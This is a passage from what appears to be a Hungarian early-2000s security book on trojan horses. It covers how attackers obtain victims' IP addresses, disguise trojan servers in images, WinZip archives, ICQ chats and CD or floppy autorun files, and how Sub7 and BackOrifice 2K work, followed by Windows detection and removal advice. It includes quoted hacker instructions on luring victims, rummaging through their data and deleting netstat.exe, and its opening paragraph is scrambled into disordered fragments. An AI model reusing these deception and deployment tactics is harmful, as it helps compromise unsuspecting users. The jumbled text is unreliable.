trójai elrejtése a Linux SÁTÁN 1. amelyen a SÁTÁN 1. 4. hogy a hackerek nem csak az ismert módokat. az e-mail mellékleteket. A kapcsolat könnyen felismerhető 4. hogy a fertőzött számítógép egyáltalán online-ban van-e. Az IP-címet a trójaitól és az eljárás módjától függően különböző utakon kapja meg a hacker: az ICQ-val történő elhelyezés esetén a következő kapcsolatnál közvetlenül lekérdezheti az áldozat aktuális IP-címét.2. minden kapcsolódásnál egy másik. hogy a szerver az operációs rendszerrel együtt automatikusan elinduljon. választják. amelyeket a kliens el tud indítani. Mivel a legtöbb felhasználó szolgáltatón keresztül létesít internetkapcsolatot. ha a fertőzött számítógép a hálózatra. Amint a fertőzött számítógép kapcsolatba lép a hálózat- . mint pl. Szerencsére a programozás nagyon hibás volt. ha nincs fennálló közveden online-kapcsolat. A szerver konfigurálásánál meg lehet határozni a klienshez küldés módjait és az akciós lehetőségeket is. amellyel egy új felhasználót jegyzett be. amellyel meghatározott IP-tartományokat lehet tapogatni. Az akciók lehetnek viszonylag ártalmatlanok. mint a CD-ROM-meghajtó nyitása. És már meg is lehet fogni a klienssel egy fertőzött számítógép szerverét. Ezzel a programmal tud akciókat kiváltani a szerverrel a számítógépek között fennálló kapcsolaton keresztül. hogy az áldozataikhoz jussanak. Ezután igen könnyű kiolvasni remote címekből a trójai szerver IP-jét. Már csak az kell. aki ezzel elérést kapott. zel a kliens az idegen számítógép irányítócentruma lesz. A legkönnyebben úgy lehet megkaparintani az aktuális IP-t. A második lépésben el kell érni. a támadónak egy vezérlőprogramra is szüksége van. automatikus értesítést adnak. A komplex trójai programok. az a felhasznált szoftvertől függ.n. Ehhez a legtöbb trójainak integrált szkenneré is van. DOS parancssor-ra váltunk.0 forráskódja volt. EzEgy másik lehetőség. Először is aktiválni. majd telepítem és konfigurálni kell a szervert a rendszeren.2. és ha igen. milyen IP cím alatt.0 programkódjában. és ott beírjuk: netstat . A kliens ehhez célzottan a fertőzött számítógép IP-címén szólítja meg a szervert. Hogy a kliens milyen funkciókat tud vezérelni. és megkapja a támadáshoz szükséges IP-címet. Csak ezután lehet célzottan megszólítani. hogy a SÁTÁN indításakor a jelszófájlba egy bejegyzés került. Hogy hogyan használja ki ezt a veszélyes potenciált. és irányítani lehet azt. módosította a main()-funkcókat.3 Hogyan szerzik meg a hackerek az IP-t? A trójai használatához tehát szükség van a fertőzött számítógép IP-jére. amelyeket később még bemutatunk.Az elhelyezésre a hackereknek és az ilyen eszközök programozóinak is rengeteg ötletük van. A trójaik lehetnek programba integrálva vagy fájlokhoz fűzve (erről később többet). A különböző trójaiak leírása a továbbiakban következik.

hogy bekösd a szervert. különösen alkalmasak az animációk és a gag-programok. Ezután a melt server after installation szerver opció segít.3.3. pl. ha az áldozatot valóban meg akarjuk téveszteni egy fájllal. A szerver fájlokhoz fűzése a következő előnnyel jár: ki lehet indulni abból. amennyiben az éppen online van. hogy abból már igazi „gyűjtemény" áll össze. Ikon-kiosztás a szervernek Olyan programnak. Ha már így elterjeszted a szervert a nép körében. hogy értesítsenek. ha megfelelő értesítőfunkciókkal rendelkező trójait használsz. egy Defcon4 nevű hackercsoport (csak csekély mértékben módosított) szövegét fogjuk használni. ha hiányoznak a programozási ismereteik. így a vélt DOC fájlok egy megnyugtató Winword ikont tudnak prezentálni. A run command after unzipping parancs az archívból történő kicsomagolás után azonnal elindítja a szervert. aki a szervert vezérli. Az archív ártalmatlan önkicsomagoló fájllá változik. vagy be lehet építeni segédprogramokba. Hogy egy pillantást vethessünk a dolgok menetére. így tud a hacker célzottan rajtaütni a fertőzött számítógépen.) együtt csomagolják össze a szervert. 4. Erről az internet idevágó fórumain olyan rengeteg információ gyűlt össze. hogy az áldozat mit kíván. vagy mail-ben küldi el az aktuális IP-t. Ehhez minden ikon felhasználható. A hobby-hackerek. Ezeket mindenki szívesen küldi és nézegeti. mint például a Sub7-nek. pl. . A profik például más programokba integrálják a trójaiakat. az IP-t. ICQ-n vagy IRC-n keresztül küldjük. és mail-ben vagy ICQ-n keresztül üzenetet küldjenek neked. olyan funkcióik vannak speciális konfigurációs fájlokban (Editserver). A következőkben nemcsak az egyszerű álcázásokkal ismerkedünk meg. Egyes trójai kiteknek. amelyben bizonyos információkat kapsz az áldozatról és számítógépéről. amelybe a szerver be van ágyazva. hanem a hobby-hackerek eljárásaiba is betekintünk. hogy az áldozat nem fogja gyanúsnak találni vagy rossz szándékot feltételezni arról a programról vagy a képről." 4. amire szükséged van. hogy kínálja a honlapján. Képnek álcázzuk (valami nem gyereknek való mindig jól jön) vagy toolnak. Ez akkor célszerű.2 Álcázás a WinZip-pel A trójai ügyes elhelyezéséhez a világ leggyakrabban használt tömörítő programjának. Tedd fel hasznos programként a honlapodra. attól függően. sőt még a szerver ikonját is meg lehet változtatni. . amint az áldozat online van.3 így álcázzák és terjesztik a trójaiakat Ehhez a hálón nagyon sok program áll rendelkezésre. amelyekkel a legkülönbözőbb fájlokkal lehet öszszekötni a konfigurált szervert. és más fájlokkal (képek stb. tehát képekkel. PC-felhasználóként mindenesetre ismernünk kell ezeket.tál. A stratégiák egy része valóban profinak is mondható. JPG. és máris van egy tökéletesen álcázott trójai. amelyeket a programok egyébként is használnak: a képek JPEG fájlként megtévesztőén hasonlítanak az eredetire. a szerver átküldi az aktuális IP-t a kliensnek.1 A trójaiakat fájlokba integrálják A szervert össze lehet kötni különböző fájlokkal. A veszélyes kis programok terjesztésére a legkülönbözőbb lehetőségeket agyalták ki a programozók. mert annak a szándékait uralják. hogy trójait rejtettél bele. hogy könnyen és gyorsan tudják terjeszteni. akkor nem rossz. Ezek arra valók. amelybe a szervert ágyazzák. Ilyenkor egy új WinZip archívot készítenek. 4. „A szervert mail-ekén. a WinZip-nek a programbeállításait is használják egyes hackerek. A trójaiak minden esetben veszélyesek. inkább más utakat választanak. míg mások inkább csak a hobby-hackerek eszközei közé sorolhatók. tehát EXE fájlokba. vagy kérj meg egy baráti webmestert.GiF. azt persze nem kell elmondani. mert ez a sikeres telepítés után azonnal törli a szervert. illetve az internettel.

a régebbi ICQ-verziók egy kis búgját is kihasználhatjuk: ezek általában nem mutatják meg a fájlvégződéseket. Ha egy fájlt photo. A hacker ráér A szervert általában nem az első kapcsolatfelvételnél küldjük el az ICQ-n keresztül. ha kezdetnek elküldünk egy pár tiszta fájlt. A CD-ROM-on megváltoztatja az Autorun. Ha a fájl küldéséhez az ICQ-t használjuk. hiszen a kontaktlistát a beleegyezése nélkül bővítették. ez a trójai túl kicsi ahhoz. Ha a fájlt visszautasítja az ICQ-n keresztül. anélkül. Ilyen eset- ben már csak ártatlan kifogások segítenek. megnyílik egy hátsó kapu. amelyek az ICQ-nak köszönhetően adódnak a hackereknek. A legtöbb trójai a sok szolgáltatás miatt már eleve akár 400 Kbájt is lehet. Megkeressük az áldozatot a trójai terjesztéséhez. lent) • MICQ (többször elindítja az ICQ-t) • ICQ-AutoAuthorize/IP-Unhider Patch • The Thing (kis trójai) A MICQ egy program. és hozzáfűzzük a kontaktlistához. Férfi áldozatokhoz általában a női identitás az ideális. Egy pár nap múlva azután már sokkal kisebb feltűnést kelt bármilyen állomány. Amint ez a fájl az áldozat gépén egyszer lefutott. ha generálunk egy új ICQ-UIN-t (a MICQ-val többel is online lehetünk egyszerre). Mint már mondtuk.4.4 Elég egy CD és az automatikus lejátszás funkció A trójai kihelyezésének egyik kedvelt módja a CD-n keresztüli terjesztés. hogy feltűnjön. ez így megy (megint a Defcon4 „információi" szerint): Először begyűjtünk minden eszközt.inf fájlt. amely lehetővé teszi az ICQ több példányának a párhuzamos indítását. Tehát akinek van egy kis tapasztalata. A legjobb. valamit fecsegni. még mindig el lehet neki küldeni egy pár nappal később egy anonim mail-fiókról. amely egy trójaira utal .inf szövege. hogy az áldozat észreveszi a támadást. Az áldozatot persze nem kényszerítjük. álcázzuk a saját identitásunkat. „Ha az áldozat tényleg gyanítja. Sokkal jobb. 40 Kbájt (nagyjából annyi. átvitelkor csak a photo. Ezen kívül az infóban minden személy IP-jét megmutatja. Nos. Ehhez egy program vagy egy játék kalózmásolatát használja a hacker. hogy elfogadja a fájlt.3 A trójaiakat az ICQ-val is tovább lehet adni Ön is kedveli ezt a kényelmes kommunikációs szolgáltatást az interneten? Van már egy listája kedvelt „beszélgetőpartnereiről"? Akkor valószínűleg érdekelni fogják azok a lehetőségek. Az ICQ Auto-Authorize/IP-Unhider-Patch megengedi UIN-ek hozzáfűzését a saját kontaktlistához. és ez nem különösebben feltűnő.3. hogy a másiknak ehhez engedélyt kellene adnia.exe nek nevezünk el. Álcázás az ICQ-val Ha lehet. mint hacker meg hasonlók garantáltan nem fordulnak elő.3. mint egy nagyobb kép). amelyben olyan fogalmak.jpg. Ezek az alábbiak lennének: • A Sub7 trójai (magyarázat 1. amelyen át más fájlokat lehet feltölteni és végrehajtani. amire szükségünk lesz. Ezt többnyire a közeli környezetben található célok megtámadásához választják. Egy Autorun. A The Thing ezzel szemben csak kb. Ekkor reális az esélye annak. A The Thing egy kis trójai. akkor is. és aztán egy nagyon kicsi fájllal megpróbálkozni. hogy mi rejtőzik egy ilyen fájl mögött. ha ez a funkció nálunk nincs aktiválva (az IP-ről és kiosztásáról lásd az alapismeretekről szóló fejezetet). Ezzel egyidejűleg lehet online két vagy több UIN. amilyen például a The Thing. hogy egy fájl mögött vírus vagy trójai rejtőzik. egyszerűen várni kell pár napot. az könnyen kiszámolhatja magának." 4.jpg jelenik meg. akkor amilyen jól csak lehet.

anélkül. Az adatok azonnali tönkretétele inkább személyes ellenségeskedésből fakad. hogy a user előtt ne jelenjen meg a futtatás DOS-ablakban. Most az editorral készít egy batch-fájlt (kötegelt parancsfájlt) a lemez főkönyvtárában.3. Ez a legegyszerűbben férgekkel (warm) érhető el. a trójai is elindul. Persze azért ez a motívum sem zárható ki. 4. amelyek magas rákattintási és ezzel installálási arányt garantálnak. A trójai tulajdonképpen minden esetben olyan támadási technikát jelent. Fontosabbak a hálózati hozzáférési jelszavak stb. amelynek például Film a neve.7 Mit csinálnak a hobby-hackerek a trójaiakkal? A kérdés az első hallásra figyelemreméltóan hangzik.3. Ezzel szemben egy letöltésre kínált anyagot először fáradságosán ismertté kell tenni. amelyek úgy szaporodnak.MPEG fájlt). amelynél fontosabb a hozzáférés. hogy észrevehető lenne. A terjesztés CD-n keresztül is inkább a hobby-hackereknek való. az internet-kapcsolat .Az alapelv a következő: a felhasználó beteszi a CD-ROM-ot a meghajtójába.) válik igazán vonzóvá. egy vírus végülis sokkal sikeresebb. 4. Ehhez a Windows 9.5 A lemezek majdnem ugyanígy működnek Ez az alapelv a lemezekre is átvihető. A Film Data mappába másolja a tulajdonképpeni filmet (*. az egyik neve mondjuk Film Data. a legtöbb ember ugyan kíváncsi.6 További terjesztési stratégiák A trójaiak terjesztésének különböző stratégiái immár világossá váltak. és ekkor a következőképpen működik. alkalmasabbak a vírusok. de ha csupán a nagy mértékű pusztítás a cél. Ebben a két esetben más késztetések vannak a háttérben. a másik Xxdata mappába másolja a szervert. Esetünkben tehát a szervert is. és erre.inf fájl adatait és végrehajtja a fájlt. Az @echo parancs szolgál arra. mert a hordozó csak a tartalma révén (játék. Emellett természetesen terjesztési stratégiát is kell fejleszteni. és a szerver automatikusan elindul a játék bevezetőjével együtt. és elindítja a Film.bat néven menti. mert az ilyen tömeges fertőzések mind a tervezés. Ez utóbbinál nem kell célzott támadásokkal és hasonlókkal bajlódnia a hackernek. Az olcsó szörfözésre utaló jelszavak viszonylag érdektelenek. Egy nagy számban kihelyezett trójaiból beérkező adatokat természetesen ki is kell értékelni. mint a rombolás. mert nem minden trójai kínál valóban érdekes adatokat a hackereknek. Addig pedig a terv még csődöt is mondhat. és támadhatóvá teszi az áldozatot.bat-ot. És mostanra már tudják. mielőtt a megfelelő számú kihelyezés megtörténhetne. Ebben a mappában létrehoz még két további mappát. és Film. 4.AVI vagy *. mint azt majd a következő fejezet mutatja. hogy a levelezési címlisták minden címére elküldik magukat. mind a kiértékelés/felhasználás szempontjából sokkal ráfordítás-igényesebbek. A talán legfontosabb és legsikeresebb eljárás a letöltésre kínált anyagokkal és a vírusokkal való terjesztés. Egy trójait gyorsan nagy számban elhelyezni nemcsak ideális álcázást kíván . milyen stratégiákkal tudja egy hacker célzottan megközelíteni az áldozatát. A batch-fájl elindítja a szervert anonimitása védi a tettest. a másiké Xxdata. hanem egyszerűen az időfaktorra (dátumvezérlés) vagy a használati gyakoriságra (a rombolás x fájlindítás után indul) épít. Ez egy CD-ROM felismerése után azonnal kiértékeli a megfelelő Autorun.x automatikus lejátszás funkcióját használja ki a hacker.a Kurnyikova-vírus jó példa a sikert ígérő környezetekre. amely lehetővé teszi az elhelyezést világszerte több ezernyi számítógépen. A közvetlen kapcsolatok az ICQ-n keresztül elsősorban a közelebbi és a távolabbi ismerősök területén könnyítik meg a terjesztést. A hacker létrehoz egy mappát a lemezen.3. de technikailag nem elég képzett ahhoz. feltört program stb. Természetesen egy trójaival jelentős károkat lehet okozni. Ha ezt a lemezt most megkapja a felhasználó. de ha belegondolunk. hogy célzottan jelszavakat vagy hasonlókat kutasson ki.

A Sub7 a legkomolyabb és a neten legelterjedtebb trójaiak közé tartozik. a következő tanácsot tartja készenlétben az internet: „Ha az ember az első fertőzési kísérleteknél saját magát fertőzi meg.0.A legtöbben azonban. Legyetek szívesek. és nézd meg az összes adatát. akik csak úgy kísérletezgetnek egy kicsit ezzel. illetve hogy még most is az.01!). Hogy világszerte milyen sok rendszer volt Sub7-tel fertőzött. azaz a remote access tool vagy remote administration tool.. . egy backdoor-trójai. nem?" Önfertőzés ügyetleneknek Azoknak a hobby-hackereknek.azért ez förtelmes lenne. az interneten található „szabályokból" is láthatjuk. megváltoztathatnád a startlapját. Áthelyezhetnél fájlokat.egy trójai rémisztő lehetőségekkel A Sub7. „Ha sok fantáziával és több ICQ-UIN-nal végre sikerült egy trójait elültetnünk az áldozat számítógépén. információkat fűzhetnél dokumentumokhoz. Én személy szerint teljes mértékben az adatmegsemmisítés ellen vagyok. Általában kíváncsiság és egy adag vandalizmus rejtőzik a háttérben. Amint hozzáférünk az áldozat adataihoz. Ismert remote access program pl. 4. nagyobb hálózatokban. fogja. Azóta ez a backdoor-tool folyamatosan tökéletesedik és új funkciókkal bővül. mint a Sub7. Ezzel a Windows programmal viszont minden hálózati kapcsolatot meg lehet nézni. 1999 márciusában került a hálóra az első verziókban. Mindannyian tudjuk. Először túrd át pár napig az áldozat gépét. \windows\netstat. Destruktív módon felhasználva. Az egyes funkciók későbbiekben történő említése bizonyosan hozzá fog járulni az ilyen szoftverből eredő potenciális veszélyek felméréséhez. egy ilyen szoftverrel a teljes ellenőrzést át lehet venni egy fertőzött számítógép felett.. nem kell mindjárt nekikezdeni a mulatságnak. több fájlból áll. hogy valójában mit is akarnak kezdeni az áldozat gépén. és tovább tanulmányozhatnád a trójai sok funkcióját. a rendszergazdák távkarbantartó és konfigurációs munkáját könnyíti meg a hálózatba kötött számítógépeken. Ez azt jelenti. amelyek „több mint elég" fertőzött rendszert jelentenek. amit a gép tulajdonosa is megtehet.4. ha fontos adatokat veszítünk el. hogy a megfelelő kliens tulajdonosa minden olyan funkciót végrehajthat a fertőzött gépen. akkor egyszerűen kliensként összeköttetésbe lép saját magával (a saját gép IP-je mindig 127. azt az úgynevezett portszkennek mutatják. és törli a szervert!" Pillanatkép egy trójairól 4. egy Mobman álnéven működő programozó „válaszaként" a NetBusra és a BackOrifice-vz. ne nagyon bántsátok az áldozat adatait.4 Sub7 . A távkarbantartó szoftver.exe-t. Egy olyan trójai. tulajdonképpen nem is tudják. amelyek egymáshoz kapcsolódva gondoskodnak a támadó gép és a fertőzött gép kapcsolatáról. akik kísérletezés közben saját magukat fertőzik meg trójaival. elsőként töröljük a C.1 Támad a Sub7 A Sub7 tágabb értelemben egyfajta távkarbantartó programhoz hasonlítható. a PCAnywher a Symantectől. amint azt a következő. hogy az már nem túl vidám dolog.

És ehhez a program nem a Windows operációs rendszer valamiféle búgjait vagy belső dokumentálatlan API-jeit használja. amellyel a szervert lehet konfigurálni. A CDC ezzel a verzióval „trójainak" kikiáltott programjának a hírén akart javítani. Azt is meg lehet adni. gombokkal. jelszókikémlelés. a port. hanem kizárólag dokumentált Windows funkcióhívásokat. A klienst teljesen hagyományos Windows-programként kell elképzelni. grafikus felülettel. A 2000-ben a Cult of the Dead Cow (CDC) kihozta a BackOrifice új verzióját: a BO2K-t.5 BackOrifice 2K . amelyekről egészen kényelmesen el lehet indítani az egyes funkciókat. így például a magasfokú titkosítással. amelyről a trójai kommunikál (az újabb verziókban véletlenszerű is lehet .állította a hackercsoport . továbbá itt lehet meghatározni a szerver nevét is. amely trójai falóként észrevétlenül tudott futni egy Windows 9x operációs rendszeren. és új képességekkel bővítette. Ehhez jönnek egyes ICQ-beállítások (értesítés. hogy a szerver közvetlenül a telepítés után azonnal elinduljon-e.itt a port a futási időben derül ki). és hogy egy másik futtatható fájlhoz kapcsolódjon-e. Ugyanezen év augusztus 7-ig a programot több mint 35 ezerszer töltötték le a CDC honlapjáról. Itt lehet például rögzíteni.Hálózati eszköz vagy támadás a Microsoft ellen 1998. hogy Sub7-es fertőzöttségről lehessen beszélni. Edit-Server Az Edit-Server egy kiegészítő program. hogy a trójai egyes funkcióit inicializálja. és hogy a felhasznált port rejtve legyen-e. Egy ügyesen programozott kliens/szerver alkalmazásról volt szó. amely csaknem lehetetlenné teszi. A hackereket azonban ezek a dolgok nem nagyon érdekelhették. hogy az a szervert az installáció előtt elrejtse. menükkel és kiválasztómezőkkel. bár azt nem ismerték el. Különösen ennek kellett a BO2K-t érdekessé tenni a hálózati rendszergazdák számára. hogy Windows 9x alatt biztonsági problémák lennének. és megkísérli a célrendszerre telepíteni a szervert. hogy miként telepítse magát a célgépre a szerver. Ennek a modulnak tehát feltétlenül telepítve kell lennie az irányítandó rendszerre ahhoz. 4. hogy a műveleti konzolok (kliens) között kapcsolatot teremtsen. mert a BackOrifice ezután is az egyik legkedveltebb trójai maradt. Pillantás a Sub7 váltóközpontjára Minden működést a kliens irányít A kliensre azért van szükség.a Windows 95/98 alatti súlyos biztonsági hiányosságok feltárása. UIM-kicsomagolás). Las Vegasban. augusztus elején mutatta be a texasi Cult of the Dead Cow hackercsoport a BackOrifice Windows Remote Administration Tool-t egy hackertalálkozón. és irányítsa a fertőzött gépet. A BackOrifice célja . és ezzel irányítóközpontként működhessen.A Sub7 szervere A szerver ahhoz szükséges. hogy az átvitt adatok egy harmadikhoz kerüljenek. A Sub7-nek kapcsolata van a szerverre! így előkészítve sokféleképpen közelíti meg a támadó az áldozatát. A Microsoft válasza nem váratott magára sokáig. .

exe Funkció Ez a szerver.6. Fájlok és funkcióik együttműködése 4.dll enc_serpent. Először . 4. Ha elindul. és kisebb bővítéseket (pluginek) hozzáfűzni. Ha nem vagyunk biztosak magunkban.vagy jobban mondva: a gép totál lefagy. hogyan lehet felismerni és leküzdeni egy rendszerben a trójai vírusokat. a gép már megfertőződött. Mobman például beépített egy ilyen funkciót a Sub7-be. Sőt bizonyos esetekben még ahhoz is vezethet. hogy a Minden fájl ellenőrzése vagy hasonló funkció aktív legyen. hogy az adatok kódoltan közlekedjenek a kliens és a szerver között.tekintsünk el az érintett fájlok törlésétől. illetve karanténba tenni.és megtévesztheti a víruskeresőt.és trójai-szkenner Alapvetően minden rendszerben mindig kell telepített vírusvizsgálónak lennie.) végezni a szerveren. hogy a rendszer használhatatlanná válik . amelyen a szerver és a kliens összekapcsolódnak. Fájl bo2k. mivel az ilyen programok keresése gyakran beavatkozásokat igényel a rendszerbe. illetve a Registry-be. hogy minden Windows-indításkor automatikusan aktiválódjon.4. Próbáljuk meg a fájlokat izolálni.6 így ismerjük fel a trójait a rendszerünkben Most. Ez a plugin az első pillantásra ugyan nem nyújt új lehetőségeket.dll Funkció Lényegében ezek a szerver alapfunkciói. Ezt a gyártók gyakran nem állítják be előzetesen. A grafikus felhasználói felületen keresztül lehet a fertőzött PC-t távirányítani. a megtisztítás különböző lehetőségeit fogja javasolni. A szervert kiegészítő részekkel (pluginek) még bővíteni lehet. mert a szkennelés így túl sokáig tarthat. amelyen a rendszerkönyvtárba másolódik stb.dll B02K pluginek Ez a plugin látja el az értesítési funkciókat: ha a szerver elindult.5. bo2kgui. hogy a szkenner ne törölje azonnal a fertőzött fájlokat. hogy elkerüljük az esetleges károkat. srv_rattler.dll io_stcpio. hogy fájlokat lehessen kicserélni. A trójaiak leküzdésének most következő módjánál nagyon óvatosnak kell lennünk. Ha a vírusvizsgáló nem talál fertőzött fájlokat. a Rattler mailben elküldi az áldozat IP-jét. Hogy az ilyen esetekben mit tehetünk. A trójai rejtőzködhet . A gyakorlatlan felhasználónak ez nehéznek tűnhet. azt a következő szakasz részletezi. A SERPENT feladata. nem vagyunk-e már magunk is fertőzöttek.mint mondtuk . port.1 A BO2K és összetevői íme egy áttekintés a legfontosabb fájlokról és funkcióikról a távkarbantartási funkciók és a trójai működés komplex együttműködésében. hogy a számítógép tiszta. . Ezért szeretnék itt néhány lehetőséget bemutatni. Továbbá feltétlenül szükséges. hogy a trójai falovak bevetésének a lehetőségei és potenciális veszélyei ismertté váltak.).exe szekötéséhez. hogy különösebb ismeretekre lenne szükség róla. Ha a szerver csak egyszer is elindul. automatikusan a C:\Windows\System könyvtárba másolja magát. a szerver neve. Ezzel a programmal lehet fontos beállításokat (kódolás. Mielőtt a kliens a szerverrel kapcsolatba tudna lépni. Ez a plugin gondoskodik arról. így ezeket nem lehet BO2Kadatforgalomként (Traffic) felismerni. felmerül a kérdés.1 Vírus. Az IP (ez a címe egy PC-nek az interneten) is szükséges a kliens és a szerver öszbo2kcfg. Arra is figyelnünk kell. anélkül. az még messze nem jelenti azt. Ha a vírusvizsgáló fertőzést talál. hiszen szinte naponta fedeznek fel új trójaiakat. mert egyes trójaiak szerzői biztonsági intézkedéseket építettek a programjaikba az eltávolításnak e módja ellen. de ez kódolja a TCP-csomagok headerét. és ez a vírusvizsgálónak jelentős problémákat okozhat. Vannak azonban olyan programok. A Registry-be is bejegyzi magát úgy.exe A kliens a BO2K „látható" része. hogy ez állandóan aktualizálva legyen. néhány dolgot még be kell állítani rajta (jelszó stb. A BO2K legfontosabb fájljaihoz jön még néhány plugin: Fájl bo2k_inetcmd. amelyek jelentősen megkönnyítik a standard trójaiak felkutatását. inkább kérjünk tanácsot szakembertől. Az első vizsgálat előtt figyeljünk arra.

és szerencsére nagyon ritkák is. és írjuk be msconfig. mert nagyon nagy a felfedezés valószínűsége. vírusvizsgálók.de ez is nagyon ritka.elég ritka Ebben a fájlban a shell= paraméter alatt fordulhat elő bejegyzés. amelyek ezt az utat használnák. Az indulásnak ezt a lehetőségét a rendszerindítással együtt sok ártalmatlan program (pl. Mivel azonban ez a lehetőség is adott.bat . írjuk be a Start/Futtatásba a sysedit. Az Indítópultot a következőképpen lehet ellenőrizni: közvetlenül a Start menüből: Start Programok Indítópult vagy C:\Windows\Startmenu\ProgramokMndítópult. mert ide is bejegyzi magát néhány ártalmatlan program.3 Windows Registry . ez rendszerint azt jelenti: egy parancssor egy fájl másolását írja elő. Menjünk egyszerűen a Start gombra. illetve parancsikonokat kell törölni. Számos más Registry-bejegyzési lehetőség is előfordul autorun célból. hogy online kapcsolat esetén kész legyen parancsokat fogadni a klienstől. mielőtt bármit is törölnénk.6. hogy ne legyenek rögtön láthatóak.ez már izgalmas A regisztrációs adatbázisban megnevezett útvonalak mappákként jelennek meg.x-es időkben volt érdekes Régebben nagyon kedvelt módszer volt a Win. Eddig alig ismertek olyan trójaiak. de persze ezeket (szerencsére) csak ritkán használják a trójaiak. kis rizikófaktorral Itt is óvatosnak kell lenni a törléssel. amelyet az utolsó rendszerindítás előtt töröltek. mint a Win. de nagyon ritka Ha a winstart.sys szintén a sysedit.DOS-os hulladék.ini bejegyzésein keresztül indítani a trójaiakat. System. uninstallprogramok. Óvatosan! Itt már van egy Explorer. a mappát a felhasználói profilokon keresztül lehet megtalálni (C:\WinNT\Profiles\ Username \Startmenü\Programok \Indítópult).ini-ben is el lehet helyezni egy bejegyzést az automatikus indítás céljából. Az autoexec.lehetséges.exe-t.csak a szokatlan eszközmeghajtók veszélyesek Néhány ritka trójai a Windows 95/98-s rendszerek eszköz-meghajtójaként is álcázza magát. autoexec. Az olyan rendszereknél. hogy a szervernek a rendszer hátterében állandóan futnia kell.bat vagy control. winstart.4. amelyeket nem ismerünk. Gördítsük az alsó gördítősávot egyszerűen jobbra.2 AutoRun bejegyzések Egy trójai csak akkor működik. Autostart (Indítópult)-mappa . 4. helyette azonban ezt írjuk be: sysedit.exe-vel lelhető fel.ini-t ugyanúgy nyitjuk meg szerkesztésre. A Win.ini . Járjunk el úgy. Itt aztán szokatlan dolgok után kell kutatni.bat-ot is a sysedit.6. mint az msconfig-nál. config. Több ablak is megnyílik szövegszerkesztő formában.exe-vel lehet megnézni és szerkeszteni. . Ezzel a programmal a fent nevezett bejegyzések közül sokat ellenőrizhetünk. míg a sor végét is látjuk. az illető ikonra duplán kattintva érjük el őket. A config. Nézzük meg a Load és a Run paraméterek mögötti bejegyzéseket. A control. A System.bat-ban felismerhető egy bejegyzés.exe után azonban még további bejegyzések következhetnek. aztán a Futtatás-ra. A sysedit-tel is sokat megtalálhatunk a fentiek közül.kevésbé valószínű Klasszikus változat az automatikusan indítandó programok indítására az autostart (Indítópult)-mappa. Hogy ezt kizárjuk. Ez azt jelenti. Itt megintcsak ajánlatos az óvatosság. A trójaiak ritkán használják ezt a lehetőséget. mint a Windows NT. hát megemlítjük.exe nevű bejegyzés.ini . Szükség esetén távolítsuk el a gyanús bejegyzéseket. ha a rendszerindítással együtt elindul. De persze a parancsokat többnyire rengeteg üres karakterrel álcázzák a paraméter-megnevezések mögött.) is használja. de a trójaiak is. és kényelmesen megváltoztathatunk. és esetleg programokat. és egy trójait indíthatnának el. backup programok stb. ezt semmiképpen se töröljük! Az Explorer.ini-t. Ezeket a trójaiakat azonban nehéz realizálni.sys . Hasznos segítség a Windows saját msconfig programja is. Ez az indítási lehetőség azonban nagyon valószínűtlen.ini a Windows 3.

a shell paraméterrel. Megnyílik egy program félelmetesen sok bejegyzéssel. eszközmeghajtónak is álcázhatja magát. Eszközmeghajtónak álcázás Egy trójai. Itt is egy Registry-be került bejegyzést keresünk. Ilyen esetben nem egyszerű a pontos azonosítás. mint már említettük. aminek a törlése rendszerproblémákat okoz. Rendszerint azonban csak az itt megnevezett bejegyzések vannak. azonban egy „szokatlan" path-on: . Ha valamelyik kulcs még egy futtatható fájlt is tartalmaz. Gyanú esetén ne az egész bejegyzést távolítsuk el. hanem csak a program nevét! ICQ-usereknél fennáll egy további lehetőség a következő bejegyzésnél: Registry Installed Components Vannak még az úgynevezett „Unknown-módszerek". Ezek közül csak néhány útvonal érdekes: A „%1" %*" karakterek elé be lehetne írni még egy programot. Végülis lehet az egy valódi meghajtó is. Itt is a Windows Registryt használják a program automatikus indításához. Ezek alatt az útvonalak alatt a következő bejegyzések találhatók: Registry Common Startup kulcs A bejegyzés általában Ez alatt az útvonal alatt található a szerver is. amögött egy trójai rejtőzhet.Következőként hívjuk meg a Rendszerleíró adatbázis-szerkesztőt a Start/Futtatás/Regedit-tel. illetve a Windows-regisztráció.

exe-t.exe mérete a Windows 95 alatt 11264 bájt. Tehát ha találunk egy runonce.0 trójai leírását. amelyeket ennek megfelelően be is lehet zárni. amelyek a rendszerrel „együtt futnak". A Windows 2000-be is integráltak egy nagyon jó folyamat-nézőkét.6.6. akkor itt is el lehet rejtve egy trójai. Windows 98/ME alatt pedig 40960 bájt.com/ weboldalon található. amely a http://serdarka. . és válasszuk a Mindent megmutat opciót.exe kicserélése Csak a Schoolbm trójainál ismert. Az eredeti runonce. hogy a „futó feladatokat" ellenőrizzük. Itt futtatható fájlokról van szó. A Start menü Futtatás-ba írjuk be: drwatson. hogy legközelebb egy trójai töltődik be. Hangsúlyozzuk. Ezeket különböző módokon lehet megfigyelni. ami a Windows alatt adódik.exe (C:\windows\) elindulna. hogy kell elrejtőzni a Taskmanager elől. mielőtt a tulajdonképpeni explorer.exe a C:\ -n azt eredményezhetné. és először elvégez néhány vizsgálatot. „Futó folyamatok ellenőrzése" módszer Gyakran lepleződik le egy trójai úgy. Menjünk a Nézet menüpontra. mert a legtöbb trójai „tudja". megtalált explorer. amely így lehetővé tesz egy autorun eljárást. amely mutatja a futó programokat.exe-t egy módosított fájlra cseréli. A program elindul. Ez a módszer azonban egyáltalán nem biztos.4 Módszerek az Explorer. 4.8m. A program neve: DrWatson. amely a C:\windows\system könyvtárban vagy máshol található.exe-vel a C:\ meghajtóra Egy bug miatt a Windows először mindig az első.exet futtatja le (kétséges esetben a C:\ könyvtárban). Az eredeti Windows runonce.4. LEHET! Ennek a módszernek a további magyarázatához az angolul értők olvassák el a Schoolbus 2. Kezdőknek azonban a DrWatson bonyolultnak tűnhet. Az explorer.5 A runonce. mert tényleg mindent könyörtelenül megmutat. Megjelenik egy ablak. A Windows-zal azonban egy jó kis eszközt is kapunk a futó folyamatok ellenőrzéséhez. amelynek más a mérete. amelyet a Taskmanager-rel együtt lehet elindítani. Például a Ctrl+Alt+Del billentyűkkel.

